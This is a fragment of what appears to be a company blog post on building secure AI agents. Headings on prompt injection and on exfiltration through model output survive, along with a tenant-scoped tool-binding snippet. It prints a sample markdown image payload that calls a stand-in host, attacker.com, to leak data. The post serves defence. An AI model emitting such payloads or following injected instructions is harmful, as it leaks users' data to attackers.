Skip to content
Dashboard

Building secure AI agents

CTO, Vercel

Link to headingAssume total compromise

function getAnalyticsDataTool(tenantId, startTime, endTime)

const getAnalyticsDataTool = originalTool.bind(tenantId);

Link to headingPrompt injection is a data problem

Link to headingExfiltration through model output

![payload](https://attacker.com/leak?data=123)

Link to headingDesign for failure

Ready to deploy?